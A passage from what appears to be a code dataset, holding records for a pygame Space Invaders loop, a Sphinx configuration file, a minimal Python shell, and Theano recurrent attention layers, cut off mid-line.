pygame.Rect(502, 636, 197, 29)\n high_scores = HighScores(screen, settings, BLACK, 62)\n\n stats = GameStats(settings, high_scores)\n sb = Scoreboard(settings, screen, stats)\n ship = Ship(settings, screen)\n alien = Alien(settings, screen)\n boss = BossAlien(settings, screen)\n #boss = GroupSingle()\n game_over = GameOver(screen, settings, stats, high_scores)\n bullets = Group()\n aliens = Group()\n alien_explosions = Group()\n alien_bullets = Group()\n boss_bullets = Group()\n gf.create_fleet(settings, screen, ship, aliens, alien_explosions)\n\n FPS = 60\n clock = pygame.time.Clock()\n settings.play_music()\n\n \n\n\n while True:\n dt = clock.tick(FPS) / 1000\n gf.check_events(settings, screen, stats, sb, play_button, high_scores, scores_button, ship, aliens, bullets, game_over, alien_explosions, boss)\n if stats.game_active:\n if not stats.game_over:\n ship.update(dt)\n gf.update_bullets(settings, screen, stats, sb, ship, aliens, bullets, alien_bullets, alien_explosions, dt, boss_bullets, boss)\n gf.update_aliens(settings, screen, stats, sb, ship, aliens, bullets, dt, alien_bullets, alien, alien_explosions, boss_bullets, boss)\n bullets.update()\n alien_bullets.update()\n boss_bullets.update()\n gf.update_screen(settings, screen, stats, sb, ship, aliens, bullets, play_button, game_over, alien_bullets, alien_explosions, dt, boss_bullets, boss)\n \n\n\nrun_game()\n","repo_name":"MrAntonioGuzman/space-invaders","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73004392692","text":"# pylint: skip-file\n# Configuration file for the Sphinx documentation builder.\n\nimport os\nimport sys\nsys.path.insert(0, os.path.abspath('../../scripts'))\n\n# -- Project information -----------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n\nproject = 'Geolocation'\ncopyright = '2023, Richard Loong'\nauthor = 'Richard 
Loong'\nversion = '1.0.0'\nrelease = '1.0.0'\n\n# -- General configuration ---------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n\nextensions = [\n \"breathe\",\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.autosummary\",\n ]\n\ntemplates_path = ['_templates']\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n# -- Options for HTML output -------------------------------------------------\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n\nhtml_theme = 'furo'\nhtml_static_path = ['_static']\n\n# -- Options for Breathe -----------------------------------------------------\n# https://breathe.readthedocs.io/en/latest/readthedocs.html#configuration\n\nbreathe_default_project = \"geolocation\"\n","repo_name":"akash-engineer/geolocation","sub_path":"docs/source/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"36464865589","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport sys\nimport os\nimport shlex\nfrom yash.builtins import *\nfrom yash.constants import *\n\nbuilt_in_cmds = {}\n\ndef register_command(name, func):\n built_in_cmds[name] = func\n\ndef tokenize(string):\n return shlex.split(string)\n\ndef execute(cmd_tokens):\n cmd_name = cmd_tokens[0]\n cmd_args = cmd_tokens[1:]\n\n if cmd_name in built_in_cmds:\n return built_in_cmds[cmd_name](cmd_args)\n\n # create a new process to execute the command\n pid = os.fork()\n\n if pid == 0: # child process\n # execute the command\n os.execvp(cmd_tokens[0], cmd_tokens)\n elif pid > 0: # parent process\n while True:\n # wait for the child process to report its status\n wpid, status = os.waitpid(pid, 0)\n\n if os.WIFEXITED(status) or os.WIFSIGNALED(status):\n break\n\n # return the status and wait for the next command\n return SHELL_STATUS_RUN\n\ndef shell_loop():\n # main loop\n status = SHELL_STATUS_RUN\n\n while status == SHELL_STATUS_RUN:\n # show the command prompt\n sys.stdout.write('> ')\n sys.stdout.flush()\n\n # read the command input\n cmd = sys.stdin.readline()\n\n # tokenize the command input\n cmd_tokens = tokenize(cmd)\n\n # execute the command and get the new status\n status = execute(cmd_tokens)\n\ndef init():\n register_command('cd', cd)\n register_command('exit', exit)\n\ndef main():\n init()\n shell_loop()\n\nif __name__ == '__main__':\n main()","repo_name":"yangruihan/my_own_bash","sub_path":"yash/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"73039181493","text":"\nfrom math import sqrt, pi\nimport theano\nimport theano.tensor as T\nimport theano.sandbox.cuda as cuda\nimport numpy\nfrom MultiBatchBeam import multi_batch_beam\nfrom ActivationFunctions import elu\nfrom theano.ifelse import ifelse\n\n\nclass RecurrentTransformBase(object):\n name = None\n\n def __init__(self, force_gpu=False, layer=None, for_custom=False):\n \"\"\"\n :type layer: NetworkRecurrentLayer.RecurrentUnitLayer\n :param bool for_custom: When used with LSTMC + LSTMCustomOp, there are two instances of this class:\n One via the network initialization as part of the layer (for_custom == False)\n and another one via CustomLSTMFunctions (for_custom == True).\n The symbolic vars will look different. See self.create_vars_for_custom().\n \"\"\"\n self.force_gpu = force_gpu\n if force_gpu:\n self.tt = cuda\n else:\n self.tt = T\n self.layer = layer\n self.input_vars = {} # used as non_sequences for theano.scan(), i.e. 
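kept constant across time steps and handed 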
as input for the step() function\n self.state_vars = {} # updated in each step()\n self.state_vars_initial = {}\n self.custom_vars = {}\n self.for_custom = for_custom\n if for_custom:\n self.create_vars_for_custom()\n else:\n transforms_by_id[id(self)] = self\n self.create_vars()\n\n def copy_for_custom(self, force_gpu=True):\n \"\"\"\n :returns a new instance of this class for LSTMCustomOp\n \"\"\"\n return self.__class__(force_gpu=force_gpu, for_custom=True, layer=self.layer)\n\n def _create_var_for_custom(self, base_var):\n var = self._create_symbolic_var(base_var)\n setattr(self, var.name, var)\n return var\n\n def _create_symbolic_var(self, base_var):\n if self.force_gpu:\n base_type_class = cuda.CudaNdarrayType\n else:\n base_type_class = T.TensorType\n dtype = base_var.dtype\n ndim = base_var.ndim\n type_inst = base_type_class(dtype=dtype, broadcastable=(False,) * ndim)\n name = base_var.name\n var = type_inst(name)\n return var\n\n def create_vars_for_custom(self):\n \"\"\"\n Called via CustomLSTMFunctions.\n \"\"\"\n assert self.for_custom\n self.y_p = self.tt.fmatrix(\"y_p\")\n\n layer_transform_instance = self.layer.recurrent_transform # this is a different instance\n assert isinstance(layer_transform_instance, RecurrentTransformBase)\n assert layer_transform_instance.layer is self.layer\n for k, v in layer_transform_instance.custom_vars.items():\n assert getattr(layer_transform_instance, k) is v\n assert v.name == k\n self.custom_vars[k] = self._create_var_for_custom(v)\n self.state_vars_initial = None # must not be used in custom op. we will get that from outside\n for k, v in layer_transform_instance.state_vars.items():\n assert getattr(layer_transform_instance, k) is v\n assert v.name == k\n self.state_vars[k] = self._create_var_for_custom(v)\n\n def init_vars(self):\n pass\n\n def create_vars(self):\n \"\"\"\n Called for regular theano.scan().\n \"\"\"\n pass\n\n def add_param(self, v, name = None, **kwargs):\n if name: v.name = name\n assert v.name\n if not self.for_custom:\n self.layer.add_param(v, v.name + \"_\" + self.name,**kwargs)\n self.add_var(v)\n return v\n\n def add_input(self, v, name=None):\n if name: v.name = name\n assert v.name, \"missing name for input\"\n self.input_vars[v.name] = v\n self.add_var(v)\n return v\n\n def add_state_var(self, initial_value, name=None):\n if name: initial_value.name = name\n assert initial_value.name\n sym_var = self._create_symbolic_var(initial_value)\n self.state_vars_initial[initial_value.name] = initial_value\n self.state_vars[initial_value.name] = sym_var\n return sym_var\n\n def add_var(self, v, name=None):\n if name: v.name = name\n assert v.name\n self.custom_vars[v.name] = v\n return v\n\n def get_sorted_non_sequence_inputs(self):\n return [v for (k, v) in sorted(self.input_vars.items())]\n\n def get_sorted_custom_vars(self):\n return [v for (k, v) in sorted(self.custom_vars.items())]\n\n def get_sorted_state_vars(self):\n return [v for (k, v) in sorted(self.state_vars.items())]\n\n def get_sorted_state_vars_initial(self):\n return [v for (k, v) in sorted(self.state_vars_initial.items())]\n\n def set_sorted_state_vars(self, state_vars):\n assert len(state_vars) == len(self.state_vars)\n for (k, v), v_new in zip(sorted(self.state_vars.items()), state_vars):\n assert getattr(self, k) is v\n assert v.name == k\n v_new.name = k\n self.state_vars[k] = v_new\n setattr(self, k, v_new)\n\n def get_state_vars_seq(self, state_var):\n assert state_var.name in self.state_vars\n idx = 
sorted(self.state_vars.keys()).index(state_var.name)\n return self.layer.unit.recurrent_transform_state_var_seqs[idx]\n\n def step(self, y_p):\n \"\"\"\n :param theano.Variable y_p: output of last time-frame. 2d (batch,dim)\n :return: z_re, updates\n :rtype: (theano.Variable, dict[theano.Variable, theano.Variable])\n \"\"\"\n raise NotImplementedError\n\n def cost(self):\n \"\"\"\n :rtype: theano.Variable | None\n \"\"\"\n return None\n\n\nclass AttentionTest(RecurrentTransformBase):\n name = \"test\"\n\n def create_vars(self):\n n_out = self.layer.attrs['n_out']\n n_in = sum([e.attrs['n_out'] for e in self.layer.base])\n self.W_att_in = self.add_param(self.layer.create_random_uniform_weights(n=n_out, m=n_in, name=\"W_att_in\"))\n\n def step(self, y_p):\n z_re = T.dot(y_p, self.W_att_in)\n return z_re, {}\n\n\nclass DummyTransform(RecurrentTransformBase):\n name = \"none\"\n def step(self, y_p):\n return T.zeros((y_p.shape[0],y_p.shape[1]*4),dtype='float32'), {}\n\n\nclass DynamicTransform(RecurrentTransformBase):\n name = \"rnn\"\n def create_vars(self):\n self.W_re = self.add_var(self.layer.W_re, name=\"W_re\")\n def step(self, y_p):\n return T.dot(y_p,self.W_re), {}\n\n\nclass BatchNormTransform(RecurrentTransformBase):\n name = \"batch_norm\"\n def create_vars(self):\n self.W_re = self.add_var(self.layer.W_re, name=\"W_re\")\n dim = self.layer.unit.n_in\n self.sample_mean = self.add_param(theano.shared(numpy.zeros((dim,), 'float32')), \"sample_mean\")\n self.gamma = self.add_param(self.layer.shared(numpy.zeros((dim,), 'float32') + numpy.float32(0.1), \"gamma\"))\n #self.beta = self.add_param(self.layer.shared(numpy.zeros((dim,), 'float32'), \"beta\"))\n\n def batch_norm(self, h, use_shift=True, use_std=True, use_sample=0.0):\n x = h\n mean = T.mean(x, axis=0)\n std = T.std(x, axis=0)\n sample_std = T.sqrt(T.mean((x - self.sample_mean) ** 2, axis=0))\n if not self.layer.train_flag:\n use_sample = 1.0\n mean = T.constant(1. - use_sample, 'float32') * mean + T.constant(use_sample, 'float32') * self.sample_mean\n std = T.constant(1. 
- use_sample, 'float32') * std + T.constant(use_sample, 'float32') * sample_std\n mean = mean.dimshuffle('x', 0).repeat(h.shape[0], axis=0)\n std = std.dimshuffle('x', 0).repeat(h.shape[0], axis=0)\n bn = (h - mean) #/ (std + numpy.float32(1e-10))\n if use_std:\n bn *= self.gamma.dimshuffle('x', 0).repeat(h.shape[0], axis=0)\n #if use_shift:\n # bn += self.beta\n return bn\n\n def step(self, y_p):\n #return T.dot(y_p,self.W_re), {}\n return self.batch_norm(T.dot(y_p,self.W_re)), {}\n\n\nclass LM(RecurrentTransformBase):\n name = \"lm\"\n\n def create_vars(self):\n self.W_lm_in = self.add_var(self.layer.W_lm_in, name=\"W_lm_in\")\n self.W_lm_out = self.add_var(self.layer.W_lm_out, name=\"W_lm_out\")\n self.lmmask = self.add_var(self.layer.lmmask, \"lmmask\")\n self.t = self.add_state_var(T.zeros((1,), dtype=\"float32\"), name=\"t\")\n y = self.layer.y_in[self.layer.attrs['target']].flatten()\n if self.layer.attrs['droplm'] < 1.0 and (self.layer.train_flag or self.layer.attrs['force_lm']):\n eos = T.unbroadcast(self.W_lm_out[0].dimshuffle('x','x',0),1).repeat(self.layer.index.shape[1],axis=1)\n if self.layer.attrs['direction'] == 1:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[:-1] # (T-1)BD\n self.cls = T.concatenate([eos, y_t], axis=0)\n else:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[1:] # (T-1)BD\n self.cls = T.concatenate([eos,y_t[::-1]], axis=0)\n self.add_input(self.cls, 'cls')\n\n def step(self, y_p):\n result = 0\n updates = {}\n p_re = T.nnet.softmax(T.dot(y_p, self.W_lm_in))\n if self.layer.attrs['droplm'] < 1.0 and (self.layer.train_flag or self.layer.attrs['force_lm']):\n mask = self.lmmask[T.cast(self.t[0],'int32')]\n if self.layer.attrs['attention_lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)] * (1. - mask) + self.cls[T.cast(self.t[0],'int32')] * mask\n else:\n result += T.dot(p_re,self.W_lm_out) * (1. - mask) + self.cls[T.cast(self.t[0],'int32')] * mask\n else:\n if self.layer.attrs['attention_lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)]\n else:\n result += T.dot(p_re,self.W_lm_out)\n updates[self.t] = self.t + 1\n return result, updates\n\n\nclass AttentionBase(RecurrentTransformBase):\n base=None\n name = \"attention_base\"\n\n @property\n def attrs(self):\n return { \"_\".join(k.split(\"_\")[1:]) : self.layer.attrs[k] for k in self.layer.attrs.keys() if k.startswith(\"attention_\") }\n\n def create_vars(self):\n if self.base is None:\n self.base = self.layer.base\n self.n = self.add_state_var(T.zeros((self.layer.index.shape[1],), 'float32'), 'n')\n self.bound = self.add_input(T.cast(T.sum(self.layer.index,axis=0), 'float32'), 'bound')\n if self.attrs['norm'] == 'RNN':\n n_tmp = self.attrs['template']\n l = sqrt(6.) / sqrt(2 * n_tmp)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp, n_tmp*4)), dtype=theano.config.floatX)\n self.N_re = self.add_param(self.layer.shared(value=values, borrow=True, name = \"N_re\"))\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp, 1)), dtype=theano.config.floatX)\n self.N_out = self.add_param(self.layer.shared(value=values, borrow=True, name = \"N_out\"))\n if self.attrs['distance'] == 'rnn':\n n_tmp = self.attrs['template']\n l = sqrt(6.) 
/ sqrt(2 * n_tmp)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp, n_tmp)), dtype=theano.config.floatX)\n self.A_re = self.add_param(self.layer.shared(value=values, borrow=True, name = \"A_re\"))\n if self.attrs['distance'] == 'transpose':\n n_tmp = self.attrs['template']\n l = sqrt(6.) / sqrt(2 * n_tmp)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n_tmp,)), dtype=theano.config.floatX)\n self.W_T = self.add_param(self.layer.shared(value=values, name=\"W_T\"))\n if self.attrs['lm'] != \"none\":\n self.W_lm_in = self.add_var(self.layer.W_lm_in, name=\"W_lm_in\")\n self.b_lm_in = self.add_var(self.layer.b_lm_in, name=\"b_lm_in\")\n self.W_lm_out = self.add_var(self.layer.W_lm_out, name=\"W_lm_out\")\n self.drop_mask = self.add_var(self.layer.lmmask, \"drop_mask\")\n y = self.layer.y_in[self.layer.attrs['target']].flatten()\n nil = T.unbroadcast(self.W_lm_out[0].dimshuffle('x','x',0),1).repeat(self.layer.index.shape[1],axis=1)\n if self.layer.attrs['direction'] == 1:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[:-1] # (T-1)BD\n self.cls = T.concatenate([nil, y_t], axis=0)\n else:\n y_t = self.W_lm_out[y].reshape((self.layer.index.shape[0],self.layer.index.shape[1],self.layer.unit.n_in))[1:] # (T-1)BD\n self.cls = T.concatenate([nil,y_t[::-1]], axis=0)\n self.add_input(self.cls, 'cls')\n\n def default_updates(self):\n self.base = self.layer.base\n self.glimpses = [ [] ] * len(self.base)\n self.n_glm = max(self.attrs['glimpse'],1)\n return { self.n : self.n + numpy.float32(1) } #T.constant(1,'float32') }\n\n def step(self, y_p):\n result = 0\n self.glimpses = []\n updates = self.default_updates()\n if self.attrs['lm'] != \"none\":\n p_re = T.nnet.softmax(T.dot(y_p, self.W_lm_in) + self.b_lm_in)\n if self.layer.attrs['droplm'] < 1.0:\n mask = self.drop_mask[T.cast(self.n[0],'int32')]\n if self.attrs['lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)] * (1. - mask) + self.cls[T.cast(self.n[0],'int32')] * mask\n else:\n result += T.dot(p_re,self.W_lm_out) * (1. 
- mask) + self.cls[T.cast(self.n[0],'int32')] * mask\n else:\n if self.attrs['lm'] == \"hard\":\n result += self.W_lm_out[T.argmax(p_re, axis=1)]\n else:\n result += T.dot(p_re,self.W_lm_out)\n inp, upd = self.attend(y_p)\n updates.update(upd)\n return result + inp, updates\n\n def distance(self, C, H):\n dist = self.attrs['distance']\n if H.ndim == 2:\n H = H.dimshuffle('x', 0, 1).repeat(C.shape[0],axis=0)\n assert H.ndim == 3\n if dist == 'l2':\n dst = T.sqrt(T.sum((C - H) ** 2, axis=2))\n elif dist == 'sqr':\n dst = T.mean((C - H) ** 2, axis=2)\n elif dist == 'dot':\n dst = T.sum(C * H, axis=2)\n elif dist == 'l1':\n dst = T.sum(T.abs_(C - H), axis=2)\n elif dist == 'cos': # use with template size > 32\n J = H / T.sqrt(T.sum(H**2,axis=2,keepdims=True))\n K = C / T.sqrt(T.sum(C**2,axis=2,keepdims=True))\n dst = T.sum(K * J, axis=2)\n elif dist == 'rnn':\n inp, _ = theano.scan(lambda x,p,W:elu(x+T.dot(p,W)), sequences = C, outputs_info = [H[0]], non_sequences=[self.A_re])\n dst = inp[-1]\n elif dist == 'transpose':\n dst = T.sum(self.W_T.dimshuffle('x','x',0).repeat(C.shape[0],axis=0).repeat(C.shape[1],axis=1) * T.tanh(C + H),axis=2)\n else:\n raise NotImplementedError()\n return dst #/ T.cast(H.shape[1],'float32')\n\n def beam(self, X, beam_idx=None):\n if not beam_idx:\n beam_idx = X.beam_idx\n input_shape = [X.shape[0] * X.shape[1]]\n if X.ndim == 3:\n input_shape.append(X.shape[2])\n Y = X.reshape(input_shape)[beam_idx].reshape((self.attrs['beam'],X.shape[1]))\n Y.beam_idx = beam_idx\n return Y\n\n def align(self, w_i, Q):\n dst = -T.log(w_i)\n inf = T.zeros_like(Q[0, 0]) + T.cast(1e10, 'float32') * T.gt(self.n, 0)\n big = T.cast(1e10, 'float32')\n n0 = T.eq(T.max(self.n), 0)\n D = -T.log(w_i)\n\n def dtw(i, q_p, b_p, Q, D, inf):\n i0 = T.eq(i, 0)\n # inf = T.cast(1e10,'float32') * T.cast(T.switch(T.eq(self.n,0), T.switch(T.eq(i,0), 0, 1), 1), 'float32')\n penalty = T.switch(T.and_(T.neg(n0), i0), big, T.constant(0.0, 'float32'))\n loop = T.constant(0.0, 'float32') + q_p\n forward = T.constant(0.0, 'float32') + T.switch(T.or_(n0, i0), 0, Q[i - 1])\n opt = T.stack([loop, forward])\n k_out = T.cast(T.argmin(opt, axis=0), 'int32')\n return opt[k_out, T.arange(opt.shape[1])] + D[i] + penalty, k_out\n\n output, _ = theano.scan(dtw, sequences=[T.arange(dst.shape[0], dtype='int32')], non_sequences=[Q, D, inf],\n outputs_info=[T.zeros((dst.shape[1],), 'float32'), T.zeros((dst.shape[1],), 'int32')])\n return output[0], T.cast(output[1],'float32')\n\n def softmax(self, D, I):\n D = D * T.constant(self.attrs['sharpening'], 'float32')\n if self.attrs['norm'] == 'exp':\n E = T.exp(-D) * I\n E = E / T.maximum(T.sum(E,axis=0,keepdims=True),T.constant(1e-20,'float32'))\n elif self.attrs['norm'] == 'sigmoid':\n E = (numpy.float32(1) - T.tanh(D)**2) * I\n elif self.attrs['norm'] == 'lstm':\n n_out = self.attrs['template']\n def lstm(z, i_t, s_p, h_p):\n z += T.dot(h_p, self.N_re)\n i = T.outer(i_t, T.alloc(numpy.cast['int8'](1), n_out))\n ingate = T.nnet.sigmoid(z[:,n_out: 2 * n_out])\n forgetgate = T.nnet.sigmoid(z[:,2 * n_out:3 * n_out])\n outgate = T.nnet.sigmoid(z[:,3 * n_out:])\n input = T.tanh(z[:,:n_out])\n s_t = input * ingate + s_p * forgetgate\n h_t = T.tanh(s_t) * outgate\n return theano.gradient.grad_clip(s_t * i, -50, 50), h_t * i\n E, _ = theano.scan(lstm, sequences=[D,I], outputs_info=[T.zeros((n_out,), 'float32'), T.zeros((n_out,), 'int32')])\n E = T.nnet.sigmoid(T.dot(E,self.N_out))\n else:\n raise NotImplementedError()\n if self.attrs['nbest'] > 1:\n opt = 
T.minimum(self.attrs['nbest'], E.shape[0])\n score = (T.sort(E, axis=0)[-opt]).dimshuffle('x',0).repeat(E.shape[0],axis=0)\n E = T.switch(T.lt(E,score), T.zeros_like(E), E)\n return E\n\n\nclass AttentionList(AttentionBase):\n \"\"\"\n attention over list of bases\n \"\"\"\n name = \"attention_list\"\n def init(self, i):\n if self.attrs['beam'] > 0:\n img = 0\n for b in range(self.attrs['beam']):\n img += T.eye(self.custom_vars['C_%d' % i].shape[0],self.custom_vars['C_%d' % i].shape[0],b,dtype='float32')\n self.__setattr__(\"P_%d\" % i, self.add_input(img, 'P_%d' %i))\n self.__setattr__(\"B_%d\" % i, self.custom_vars['B_%d' % i])\n if self.attrs['memory'] > 0:\n self.__setattr__(\"M_%d\" % i, self.state_vars['M_%d' % i])\n self.__setattr__(\"W_mem_in_%d\" % i, self.custom_vars['W_mem_in_%d' % i])\n self.__setattr__(\"W_mem_write_%d\" % i, self.custom_vars['W_mem_write_%d' % i])\n self.__setattr__(\"C_%d\" % i, self.custom_vars['C_%d' % i])\n self.__setattr__(\"I_%d\" % i, self.custom_vars['I_%d' % i])\n self.__setattr__(\"W_att_re_%d\" % i, self.custom_vars['W_att_re_%d' % i])\n self.__setattr__(\"b_att_re_%d\" % i, self.custom_vars['b_att_re_%d' % i])\n self.__setattr__(\"W_att_in_%d\" % i, self.custom_vars['W_att_in_%d' % i])\n self.__setattr__(\"b_att_in_%d\" % i, self.custom_vars['b_att_in_%d' % i])\n if 'b_att_bs_%d' % i in self.custom_vars.keys():\n self.__setattr__(\"W_att_bs_%d\" % i, self.custom_vars['W_att_bs_%d' % i])\n self.__setattr__(\"b_att_bs_%d\" % i, self.custom_vars['b_att_bs_%d' % i])\n shape = self.layer.base[i].output_index().shape\n if self.attrs['store']:\n self.__setattr__(\"att_%d\" % i, self.add_state_var(T.zeros(shape,'float32'), \"att_%d\" % i))\n if self.attrs['smooth']:\n self.__setattr__(\"datt_%d\" % i, self.add_state_var(T.zeros(shape, 'float32'), \"datt_%d\" % i))\n if self.attrs['align']:\n self.__setattr__(\"Q_%d\" % i, self.add_state_var(T.zeros(shape,'float32') + numpy.float32(1e10), \"Q_%d\" % i))\n self.__setattr__(\"K_%d\" % i, self.add_state_var(T.zeros(shape,'float32'), \"K_%d\" % i))\n if self.attrs['momentum'] == \"conv1d\":\n self.__setattr__(\"F_%d\" % i, self.custom_vars['F_%d' % i])\n self.__setattr__(\"U_%d\" % i, self.custom_vars['U_%d' % i])\n elif self.attrs['momentum'] == \"conv2d\":\n self.__setattr__(\"F_%d\" % i, self.custom_vars['F_%d' % i])\n self.__setattr__(\"U_%d\" % i, self.custom_vars['U_%d' % i])\n elif self.attrs['momentum'] == \"mono\":\n self.__setattr__(\"D_in_%d\" % i, self.custom_vars['D_in_%d' % i])\n self.__setattr__(\"D_out_%d\" % i, self.custom_vars['D_out_%d' % i])\n self.__setattr__(\"Db_out_%d\" % i, self.custom_vars['Db_out_%d' % i])\n if self.attrs['loss']:\n self.__setattr__(\"iatt_%d\" % i, self.custom_vars['iatt_%d' % i])\n self.__setattr__(\"catt_%d\" % i, self.add_state_var(T.zeros((shape[1],), 'float32'), \"catt_%d\" % i))\n\n def create_bias(self, n, name, i=-1):\n if i >= 0: name += '_%d' % i\n values = numpy.zeros((n,), dtype=theano.config.floatX)\n return self.add_param(self.layer.shared(value=values, borrow=True, name=name), name=name)\n\n def create_weights(self, n, m, name, i=-1):\n if i >= 0: name += '_%d' % i\n l = sqrt(6.) 
/ sqrt(n + m)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(n, m)), dtype=theano.config.floatX)\n return self.add_param(self.layer.shared(value=values, borrow=True, name=name), name=name)\n\n def create_vars(self):\n super(AttentionList, self).create_vars()\n n_tmp = self.attrs['template']\n direction = self.layer.attrs['direction']\n #self.W_re = self.add_var(self.layer.W_re, name=\"W_re\")\n for i,e in enumerate(self.base):\n # base output\n B = e.output[::direction]\n self.add_input(B, 'B_%d' % i)\n # mapping from base output to template size\n self.create_weights(self.layer.attrs['n_out'], n_tmp, \"W_att_re\", i)\n self.create_bias(n_tmp, \"b_att_re\", i)\n if e.attrs['n_out'] == n_tmp:\n self.add_input(e.output[::direction], 'C_%d' % i)\n else:\n W_att_bs = self.create_weights(e.attrs['n_out'], n_tmp, \"W_att_bs\", i)\n b_att_bs = self.create_bias(n_tmp, \"b_att_bs\", i)\n h_att = T.tanh(T.dot(B, W_att_bs) + b_att_bs)\n if self.attrs['bn']:\n h_att = self.layer.batch_norm(h_att, n_tmp, index = e.output_index())\n else:\n i_f = T.cast(e.output_index(),'float32').dimshuffle(0,1,'x').repeat(h_att.shape[2],axis=2)\n h_att = h_att - (h_att * i_f).sum(axis=0,keepdims=True) / T.sum(i_f,axis=0,keepdims=True)\n if self.attrs['memory'] > 0:\n self.add_state_var(T.zeros((self.attrs['memory'], n_tmp), 'float32'), 'M_%d' % i)\n self.create_weights(n_tmp, self.layer.unit.n_in, \"W_mem_in\", i)\n self.create_weights(n_tmp, self.attrs['memory'], \"W_mem_write\", i)\n self.add_input(h_att, 'C_%d' % i)\n self.add_input(T.cast(self.base[i].output_index()[::direction], 'float32'), 'I_%d' % i)\n # mapping from template size to cell input\n self.create_weights(e.attrs['n_out'], self.layer.unit.n_in, \"W_att_in\", i)\n self.create_bias(self.layer.unit.n_in, \"b_att_in\", i)\n if self.attrs['momentum'] == 'conv1d':\n context = 5\n values = numpy.ones((self.attrs['filters'], 1, context, 1), 'float32')\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"F_%d\" % i))\n l = sqrt(6.) / sqrt(self.layer.attrs['n_out'] + n_tmp + self.layer.unit.n_re)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(self.attrs['filters'], n_tmp)), dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"U_%d\" % i))\n elif self.attrs['momentum'] == 'conv2d':\n context = 3\n values = numpy.ones((self.attrs['filters'], 1, 2, context), 'float32')\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"F_%d\" % i))\n l = sqrt(6.) 
/ sqrt(self.attrs['filters'] + 1)\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(self.attrs['filters'], 1)), dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"U_%d\" % i))\n elif self.attrs['momentum'] == \"mono\":\n size = 500\n l = 0.01\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(1, size)),\n dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"D_in_%d\" % i))\n values = numpy.asarray(self.layer.rng.uniform(low=-l, high=l, size=(size, 1)),\n dtype=theano.config.floatX)\n self.add_param(self.layer.shared(value=values, borrow=True, name=\"D_out_%d\" % i))\n self.add_param(self.layer.shared(value=numpy.zeros((1,),'float32'), borrow=True, name=\"Db_out_%d\" % i))\n elif self.attrs['loss']:\n att = e.att - T.arange(e.att.shape[1]) * e.sources[0].index.shape[0] # NB\n self.add_input(T.cast(att,'float32'), 'iatt_%d' % i)\n self.init(i)\n\n def item(self, name, i):\n key = \"%s_%d\" % (name,i)\n return self.custom_vars[key] if key in self.custom_vars.keys() else self.state_vars[key]\n\n def get(self, y_p, i, g):\n W_att_re = self.item(\"W_att_re\", i)\n b_att_re = self.item(\"b_att_re\", i)\n B = self.item(\"B\", i)\n C = self.item(\"C\", i)\n I = self.item(\"I\", i)\n beam_size = T.minimum(numpy.int32(abs(self.attrs['beam'])), C.shape[0])\n loc = T.cast(T.maximum(T.minimum(T.sum(I,axis=0) * self.n / self.bound - beam_size / 2, T.sum(I,axis=0) - beam_size), 0),'int32')\n if self.attrs['beam'] > 0:\n beam_idx = (self.custom_vars[('P_%d' % i)][loc].dimshuffle(1,0).flatten() > 0).nonzero()\n I = I.reshape((I.shape[0]*I.shape[1],))[beam_idx].reshape((beam_size,I.shape[1]))\n C = C.reshape((C.shape[0]*C.shape[1],C.shape[2]))[beam_idx].reshape((beam_size,C.shape[1],C.shape[2]))\n B = B.reshape((B.shape[0]*B.shape[1],B.shape[2]))[beam_idx].reshape((beam_size,B.shape[1],B.shape[2]))\n if self.attrs['template'] != self.layer.unit.n_out:\n z_p = T.dot(y_p, W_att_re) + b_att_re\n else:\n z_p = y_p\n if self.attrs['momentum'] == 'conv1d':\n from theano.tensor.nnet import conv\n att = self.item('att', i)\n F = self.item(\"F\", i)\n v = T.dot(T.sum(conv.conv2d(border_mode='full',\n input=att.dimshuffle(1, 'x', 0, 'x'),\n filters=F).dimshuffle(2,3,0,1),axis=1)[F.shape[2]/2:-F.shape[2]/2+1],self.item(\"U\",i))\n v = I * v / v.sum(axis=0,keepdims=True)\n z_p += T.sum(C * v,axis=0)\n if g > 0:\n z_p += self.glimpses[i][-1]\n h_p = T.tanh(z_p)\n return B, C, I, h_p, self.item(\"W_att_in\", i), self.item(\"b_att_in\", i)\n\n def attend(self, y_p):\n inp, updates = 0, {}\n for i in range(len(self.base)):\n for g in range(self.n_glm):\n B, C, I, H, W_att_in, b_att_in = self.get(y_p, i, g)\n z_i = self.distance(C, H)\n w_i = self.softmax(z_i, I)\n if self.attrs['momentum'] == 